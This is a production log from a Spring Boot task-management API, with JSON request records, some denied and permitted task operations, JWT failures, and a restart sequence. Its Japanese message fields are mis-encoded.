----------------------------------------
/var/log/web.stdout.log
----------------------------------------
Apr 13 02:32:33 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:33.258541538Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"e3058fcc-0b0a-4d0b-824c-b67d705b632a","userId":27,"path":"/api/tasks","method":"GET","status":200,"durationMs":25,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:33 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:33.260928422Z","level":"WARN","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-SYS-002","requestId":"f31ceeac-4d9f-471c-b95e-495965025e2b","path":"/api/tasks/15","method":"GET","status":403,"durationMs":17,"message":"و¥­ه‹™م‚¨مƒ©مƒ¼ه؟œç­”","safeMessage":"ه¯¾è±،م‚؟م‚¹م‚¯مپ®هڈ‚ç…§و¨©é™گمپŒمپ‚م‚ٹمپ¾مپ›م‚“","errorCode":"ERR-AUTH-005"}
Apr 13 02:32:33 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:33.262685018Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"f31ceeac-4d9f-471c-b95e-495965025e2b","userId":27,"path":"/api/tasks/15","method":"GET","status":403,"durationMs":19,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:33 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:33.263913482Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"3df1ce5a-734e-4344-8ac0-0af0ffe37a84","userId":27,"path":"/api/users","method":"GET","status":200,"durationMs":23,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:34 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:34.018496822Z","level":"WARN","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-SYS-002","requestId":"6c6b3232-3982-473b-9380-db6d10305888","path":"/api/tasks/15","method":"GET","status":403,"durationMs":21,"message":"و¥­ه‹™م‚¨مƒ©مƒ¼ه؟œç­”","safeMessage":"ه¯¾è±،م‚؟م‚¹م‚¯مپ®هڈ‚ç…§و¨©é™گمپŒمپ‚م‚ٹمپ¾مپ›م‚“","errorCode":"ERR-AUTH-005"}
Apr 13 02:32:34 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:34.020421105Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"6c6b3232-3982-473b-9380-db6d10305888","userId":27,"path":"/api/tasks/15","method":"GET","status":403,"durationMs":23,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:34 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:34.026136496Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"d0f196d2-9470-425d-8e6a-f76e644c6aab","userId":27,"path":"/api/tasks","method":"GET","status":200,"durationMs":28,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:34 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:34.033296632Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"a4297e20-ccda-479c-81e1-ae08163f997b","userId":27,"path":"/api/users","method":"GET","status":200,"durationMs":28,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:34 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:34.684588125Z","level":"WARN","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-SYS-002","requestId":"8dac4eeb-2569-4ba4-8f78-c64d28d4a42b","path":"/api/tasks/15","method":"PUT","status":403,"durationMs":18,"message":"و¥­ه‹™م‚¨مƒ©مƒ¼ه؟œç­”","safeMessage":"م‚؟م‚¹م‚¯و›´و–°و¨©é™گمپŒمپ‚م‚ٹمپ¾مپ›م‚“","errorCode":"ERR-TASK-005"}
Apr 13 02:32:34 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:34.689385508Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"8dac4eeb-2569-4ba4-8f78-c64d28d4a42b","userId":27,"path":"/api/tasks/15","method":"PUT","status":403,"durationMs":22,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:35 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:35.067184210Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"35e398c2-9a73-4646-a5b9-e02d217fd7cc","userId":27,"path":"/api/users","method":"GET","status":200,"durationMs":19,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:35 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:35.076924804Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"db1c767c-b051-4700-a404-3b9c78c1e096","userId":27,"path":"/api/tasks","method":"GET","status":200,"durationMs":25,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:35 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:35.083738669Z","level":"WARN","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-SYS-002","requestId":"3d8746a3-a5ce-41a4-89f4-c13557963057","path":"/api/tasks/15","method":"GET","status":403,"durationMs":28,"message":"و¥­ه‹™م‚¨مƒ©مƒ¼ه؟œç­”","safeMessage":"ه¯¾è±،م‚؟م‚¹م‚¯مپ®هڈ‚ç…§و¨©é™گمپŒمپ‚م‚ٹمپ¾مپ›م‚“","errorCode":"ERR-AUTH-005"}
Apr 13 02:32:35 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:35.085214238Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"3d8746a3-a5ce-41a4-89f4-c13557963057","userId":27,"path":"/api/tasks/15","method":"GET","status":403,"durationMs":29,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:35 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:35.702336516Z","level":"WARN","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-SYS-002","requestId":"35a12aa7-b4e7-4b66-a50e-bfbe458da93e","path":"/api/tasks/15","method":"DELETE","status":403,"durationMs":16,"message":"و¥­ه‹™م‚¨مƒ©مƒ¼ه؟œç­”","safeMessage":"م‚؟م‚¹م‚¯ه‰ٹé™¤و¨©é™گمپŒمپ‚م‚ٹمپ¾مپ›م‚“","errorCode":"ERR-TASK-006"}
Apr 13 02:32:35 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:35.703888650Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"35a12aa7-b4e7-4b66-a50e-bfbe458da93e","userId":27,"path":"/api/tasks/15","method":"DELETE","status":403,"durationMs":18,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:35 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:35.817148199Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"5be06ddd-8d99-4fe6-adb6-68d05554697e","userId":26,"path":"/api/tasks/15","method":"GET","status":200,"durationMs":17,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:37 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:37.534953579Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"40f7e83d-e742-4b1e-996b-9e1916baf718","userId":27,"path":"/api/users","method":"GET","status":200,"durationMs":18,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:37 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:37.539725465Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"6cf9b0eb-d67c-4501-8d5a-c7178ed211d6","userId":27,"path":"/api/tasks","method":"GET","status":200,"durationMs":23,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:40 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:40.101815966Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"e23683fc-e0ce-4339-8e27-e90381cdb890","userId":26,"path":"/api/users","method":"GET","status":200,"durationMs":23,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:40 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:40.104737204Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"a005d976-471a-446f-a4b0-ed29c468758d","userId":26,"path":"/api/tasks","method":"GET","status":200,"durationMs":26,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:40 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:40.805920394Z","level":"WARN","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-AUTH-003","requestId":"d9a85cdd-754d-4b30-a426-ae2e24779300","path":"/api/users","method":"GET","status":401,"message":"JWTو¤œè¨¼ه¤±و•—","safeMessage":"مƒˆمƒ¼م‚¯مƒ³مپŒن¸چو­£مپ§مپ™","errorCode":"ERR-AUTH-003","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:40 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:40.805854335Z","level":"WARN","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-AUTH-003","requestId":"18167b9e-ce1d-4ace-8361-8deea5c54373","path":"/api/tasks","method":"GET","status":401,"message":"JWTو¤œè¨¼ه¤±و•—","safeMessage":"مƒˆمƒ¼م‚¯مƒ³مپŒن¸چو­£مپ§مپ™","errorCode":"ERR-AUTH-003","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:40 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:40.806634297Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"d9a85cdd-754d-4b30-a426-ae2e24779300","path":"/api/users","method":"GET","status":401,"durationMs":0,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:40 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:40.806634328Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"18167b9e-ce1d-4ace-8361-8deea5c54373","path":"/api/tasks","method":"GET","status":401,"durationMs":0,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:32:41 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:41.759437813Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-TASK-003","requestId":"596e1ac7-c439-41e6-b7f4-aeb29ba0aadd","userId":26,"path":"/api/tasks/15","method":"DELETE","status":204,"message":"م‚؟م‚¹م‚¯ه‰ٹé™¤وˆگهٹں","taskId":15}
Apr 13 02:32:41 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:32:41.767091647Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"596e1ac7-c439-41e6-b7f4-aeb29ba0aadd","userId":26,"path":"/api/tasks/15","method":"DELETE","status":204,"durationMs":23,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:33:13 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:33:13.760984514Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-AUTH-001","requestId":"71576bdb-a11c-4339-a9d8-75791b8fb2a2","userId":26,"path":"/api/auth/login","method":"POST","status":200,"message":"مƒ­م‚°م‚¤مƒ³وˆگهٹں","email":"ph***@example.com"}
Apr 13 02:33:13 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:33:13.765460751Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"71576bdb-a11c-4339-a9d8-75791b8fb2a2","path":"/api/auth/login","method":"POST","status":200,"durationMs":96,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:33:13 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:33:13.843043992Z","level":"WARN","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-SYS-002","requestId":"45a94b9f-1e75-44bb-afda-7a3f462030d2","path":"/api/tasks/15","method":"DELETE","status":404,"durationMs":17,"message":"و¥­ه‹™م‚¨مƒ©مƒ¼ه؟œç­”","safeMessage":"م‚؟م‚¹م‚¯مپŒه­کهœ¨مپ—مپ¾مپ›م‚“","errorCode":"ERR-TASK-004"}
Apr 13 02:33:13 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:33:13.844782017Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"45a94b9f-1e75-44bb-afda-7a3f462030d2","userId":26,"path":"/api/tasks/15","method":"DELETE","status":404,"durationMs":18,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:36:05 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:36:05.315856907Z","level":"WARN","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-AUTH-006","requestId":"02766de5-3f90-42bc-9d32-fa4403588b5e","path":"/","method":"GET","status":401,"message":"وœھèھچè¨¼م‚¢م‚¯م‚»م‚¹","errorCode":"ERR-AUTH-001","ip":"45.79.207.71"}
Apr 13 02:36:05 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:36:05.316559823Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"02766de5-3f90-42bc-9d32-fa4403588b5e","path":"/","method":"GET","status":401,"durationMs":1,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"45.79.207.71"}
Apr 13 02:43:06 ip-10-0-2-194 web[194422]: {"timestamp":"2026-04-13T02:43:06.591581192Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-APP-002","message":"م‚¢مƒ—مƒھم‚±مƒ¼م‚·مƒ§مƒ³çµ‚ن؛†"}
Apr 13 02:43:06 ip-10-0-2-194 web[194422]: 2026-04-13T02:43:06.602Z INFO  [SpringApplicationShutdownHook] o.s.b.w.e.tomcat.GracefulShutdown - Commencing graceful shutdown. Waiting for active requests to complete
Apr 13 02:43:06 ip-10-0-2-194 web[194422]: 2026-04-13T02:43:06.620Z INFO  [tomcat-shutdown] o.s.b.w.e.tomcat.GracefulShutdown - Graceful shutdown complete
Apr 13 02:43:06 ip-10-0-2-194 web[194422]: 2026-04-13T02:43:06.645Z INFO  [SpringApplicationShutdownHook] o.s.o.j.LocalContainerEntityManagerFactoryBean - Closing JPA EntityManagerFactory for persistence unit 'default'
Apr 13 02:43:06 ip-10-0-2-194 web[194422]: 2026-04-13T02:43:06.665Z INFO  [SpringApplicationShutdownHook] com.zaxxer.hikari.HikariDataSource - HikariPool-1 - Shutdown initiated...
Apr 13 02:43:06 ip-10-0-2-194 web[194422]: 2026-04-13T02:43:06.676Z INFO  [SpringApplicationShutdownHook] com.zaxxer.hikari.HikariDataSource - HikariPool-1 - Shutdown completed.
Apr 13 02:43:11 ip-10-0-2-194 web[196666]:  .   ____          _            __ _ _
Apr 13 02:43:11 ip-10-0-2-194 web[196666]: /\\ / ___'_ __ _ _(_)_ __  __ _ \ \ \ \
Apr 13 02:43:11 ip-10-0-2-194 web[196666]: ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
Apr 13 02:43:11 ip-10-0-2-194 web[196666]: \\/  ___)| |_)| | | | | || (_| |  ) ) ) )
Apr 13 02:43:11 ip-10-0-2-194 web[196666]:  '  |____| .__|_| |_|_| |_\__, | / / / /
Apr 13 02:43:11 ip-10-0-2-194 web[196666]: =========|_|==============|___/=/_/_/_/
Apr 13 02:43:11 ip-10-0-2-194 web[196666]: :: Spring Boot ::               (v3.5.13)
Apr 13 02:43:11 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:11.590Z INFO  [main] com.example.task.TaskApplication - Starting TaskApplication v0.0.1-SNAPSHOT using Java 17.0.18 with PID 196666 (/var/app/current/task-0.0.1-SNAPSHOT.jar started by webapp in /var/app/current)
Apr 13 02:43:11 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:11.597Z INFO  [main] com.example.task.TaskApplication - The following 1 profile is active: "prod"
Apr 13 02:43:14 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:14.456Z INFO  [main] o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data JPA repositories in DEFAULT mode.
Apr 13 02:43:14 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:14.571Z INFO  [main] o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 95 ms. Found 2 JPA repository interfaces.
Apr 13 02:43:15 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:15.816Z INFO  [main] o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port 5000 (http)
Apr 13 02:43:15 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:15.843Z INFO  [main] o.a.catalina.core.StandardService - Starting service [Tomcat]
Apr 13 02:43:15 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:15.844Z INFO  [main] o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/10.1.53]
Apr 13 02:43:15 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:15.915Z INFO  [main] o.a.c.c.C.[Tomcat].[localhost].[/] - Initializing Spring embedded WebApplicationContext
Apr 13 02:43:15 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:15.917Z INFO  [main] o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 4155 ms
Apr 13 02:43:16 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:16.620Z INFO  [main] com.zaxxer.hikari.HikariDataSource - HikariPool-1 - Starting...
Apr 13 02:43:17 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:17.376Z INFO  [main] com.zaxxer.hikari.pool.HikariPool - HikariPool-1 - Added connection org.postgresql.jdbc.PgConnection@2dc3ece8
Apr 13 02:43:17 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:17.379Z INFO  [main] com.zaxxer.hikari.HikariDataSource - HikariPool-1 - Start completed.
Apr 13 02:43:17 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:17.440Z INFO  [main] org.flywaydb.core.FlywayExecutor - Database: jdbc:postgresql://taskflow-prd-rds.c5smu4yyoz4b.ap-northeast-1.rds.amazonaws.com:5432/taskflow (PostgreSQL 15.17)
Apr 13 02:43:17 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:17.607Z INFO  [main] o.f.core.internal.command.DbValidate - Successfully validated 3 migrations (execution time 00:00.101s)
Apr 13 02:43:17 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:17.690Z INFO  [main] o.f.core.internal.command.DbMigrate - Current version of schema "public": 3
Apr 13 02:43:17 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:17.714Z INFO  [main] o.f.core.internal.command.DbMigrate - Schema "public" is up to date. No migration necessary.
Apr 13 02:43:17 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:17.997Z INFO  [main] o.h.jpa.internal.util.LogHelper - HHH000204: Processing PersistenceUnitInfo [name: default]
Apr 13 02:43:18 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:18.196Z INFO  [main] org.hibernate.Version - HHH000412: Hibernate ORM core version 6.6.45.Final
Apr 13 02:43:18 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:18.307Z INFO  [main] o.h.c.i.RegionFactoryInitiator - HHH000026: Second-level cache disabled
Apr 13 02:43:19 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:19.160Z INFO  [main] o.s.o.j.p.SpringPersistenceUnitInfo - No LoadTimeWeaver setup: ignoring JPA class transformer
Apr 13 02:43:19 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:19.319Z INFO  [main] o.hibernate.orm.connections.pooling - HHH10001005: Database info:
Apr 13 02:43:19 ip-10-0-2-194 web[196666]: #011Database JDBC URL [Connecting through datasource 'HikariDataSource (HikariPool-1)']
Apr 13 02:43:19 ip-10-0-2-194 web[196666]: #011Database driver: undefined/unknown
Apr 13 02:43:19 ip-10-0-2-194 web[196666]: #011Database version: 15.17
Apr 13 02:43:19 ip-10-0-2-194 web[196666]: #011Autocommit mode: undefined/unknown
Apr 13 02:43:19 ip-10-0-2-194 web[196666]: #011Isolation level: undefined/unknown
Apr 13 02:43:19 ip-10-0-2-194 web[196666]: #011Minimum pool size: undefined/unknown
Apr 13 02:43:19 ip-10-0-2-194 web[196666]: #011Maximum pool size: undefined/unknown
Apr 13 02:43:20 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:20.799Z INFO  [main] o.h.e.t.j.p.i.JtaPlatformInitiator - HHH000489: No JTA platform available (set 'hibernate.transaction.jta.platform' to enable JTA platform integration)
Apr 13 02:43:20 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:20.869Z INFO  [main] o.s.o.j.LocalContainerEntityManagerFactoryBean - Initialized JPA EntityManagerFactory for persistence unit 'default'
Apr 13 02:43:21 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:21.793Z INFO  [main] o.s.d.j.r.query.QueryEnhancerFactory - Hibernate is in classpath; If applicable, HQL parser will be used.
Apr 13 02:43:23 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:23.767Z WARN  [main] o.s.b.a.o.j.JpaBaseConfiguration$JpaWebConfiguration - spring.jpa.open-in-view is enabled by default. Therefore, database queries may be performed during view rendering. Explicitly configure spring.jpa.open-in-view to disable this warning
Apr 13 02:43:23 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:23.832Z INFO  [main] o.s.s.c.a.a.c.InitializeUserDetailsBeanManagerConfigurer$InitializeUserDetailsManagerConfigurer - Global AuthenticationManager configured with UserDetailsService bean with name customUserDetailsService
Apr 13 02:43:24 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:24.454Z INFO  [main] o.s.b.a.e.web.EndpointLinksResolver - Exposing 1 endpoint beneath base path '/actuator'
Apr 13 02:43:25 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:25.309Z INFO  [main] o.s.b.w.e.tomcat.TomcatWebServer - Tomcat started on port 5000 (http) with context path '/'
Apr 13 02:43:25 ip-10-0-2-194 web[196666]: 2026-04-13T02:43:25.375Z INFO  [main] com.example.task.TaskApplication - Started TaskApplication in 15.768 seconds (process running for 17.108)
Apr 13 02:43:25 ip-10-0-2-194 web[196666]: {"timestamp":"2026-04-13T02:43:25.479634531Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-APP-001","message":"م‚¢مƒ—مƒھم‚±مƒ¼م‚·مƒ§مƒ³èµ·ه‹•"}
Apr 13 02:43:25 ip-10-0-2-194 web[196666]: {"timestamp":"2026-04-13T02:43:25.495122468Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-APP-003","message":"è¨­ه®ڑèھ­è¾¼وˆگهٹں","loadedProfiles":"prod"}
Apr 13 02:46:03 ip-10-0-2-194 web[196666]: 2026-04-13T02:46:03.820Z INFO  [http-nio-5000-exec-1] o.a.c.c.C.[Tomcat].[localhost].[/] - Initializing Spring DispatcherServlet 'dispatcherServlet'
Apr 13 02:46:03 ip-10-0-2-194 web[196666]: 2026-04-13T02:46:03.820Z INFO  [http-nio-5000-exec-1] o.s.web.servlet.DispatcherServlet - Initializing Servlet 'dispatcherServlet'
Apr 13 02:46:03 ip-10-0-2-194 web[196666]: 2026-04-13T02:46:03.825Z INFO  [http-nio-5000-exec-1] o.s.web.servlet.DispatcherServlet - Completed initialization in 5 ms
Apr 13 02:46:04 ip-10-0-2-194 web[196666]: {"timestamp":"2026-04-13T02:46:04.537988447Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-AUTH-001","requestId":"affda893-5083-4d8b-a9e8-ca269215a06b","userId":6,"path":"/api/auth/login","method":"POST","status":200,"message":"مƒ­م‚°م‚¤مƒ³وˆگهٹں","email":"te***@example.com"}
Apr 13 02:46:04 ip-10-0-2-194 web[196666]: {"timestamp":"2026-04-13T02:46:04.576676415Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"affda893-5083-4d8b-a9e8-ca269215a06b","path":"/api/auth/login","method":"POST","status":200,"durationMs":657,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:46:04 ip-10-0-2-194 web[196666]: {"timestamp":"2026-04-13T02:46:04.847013968Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"b0149127-0527-4317-8e69-b1b2cc7d29eb","userId":6,"path":"/api/users","method":"GET","status":200,"durationMs":193,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:46:04 ip-10-0-2-194 web[196666]: {"timestamp":"2026-04-13T02:46:04.903183751Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"5498fc6b-cff9-4dd1-abaf-71e56400f217","userId":6,"path":"/api/tasks","method":"GET","status":200,"durationMs":256,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:46:12 ip-10-0-2-194 web[196666]: {"timestamp":"2026-04-13T02:46:12.193946207Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"a3255f80-b53d-4e85-ae02-2c9b6b7fba60","userId":6,"path":"/api/tasks/5","method":"GET","status":200,"durationMs":40,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
